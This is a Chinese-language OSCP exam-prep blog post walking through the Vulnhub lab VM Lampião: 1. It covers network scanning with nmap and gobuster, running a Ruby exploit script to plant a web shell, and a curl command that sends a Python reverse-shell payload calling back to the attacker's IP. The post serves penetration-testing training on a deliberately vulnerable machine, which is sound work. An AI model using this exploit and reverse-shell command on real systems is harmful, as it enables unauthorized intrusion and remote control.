OSCP备考_0x12_Vulnhub靶机_Lampião: 1

Ethan医生3个月前靶场95
名称说明
靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.136

arp-scan 192.168.233.1/24

image.png

nmap -p- 192.168.233.136 

image.png

nmap -p22,80,1898 -A -T4 192.168.233.136

image.png

直接爆破80端口 直接timeout


image.png

那测试看看18978端口,查询的时后最好加后缀查询-x

gobuster dir -u http://192.168.233.136:1898 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt


image.png

image.png

image.png

直接使用rb脚本进行webshell

ruby 44449.rb http://192.168.233.136:1898/

image.png

这里既然可以用访问的方式让shell反弹给自己

curl 'http://192.168.233.136:1898/shell.php' -d "c=python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"192.168.233.168\",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")'"

image.png

nc -lvnp 3333

image.png

接下来查看有没有可以做提权的操作获取root权限


image.png

image.png

cat flag.txt

image.png




标签: OSCP

相关文章

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x47_HackThBox靶机_Windows_conceal

OSCP备考_0x47_HackThBox靶机_Windows_conceal

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)我们普通的tcp啥都没有,所以考虑udp扫描当然也有可能是...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

OSCP备考_0x48_HackThBox靶机_Windows_Chatterbox

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。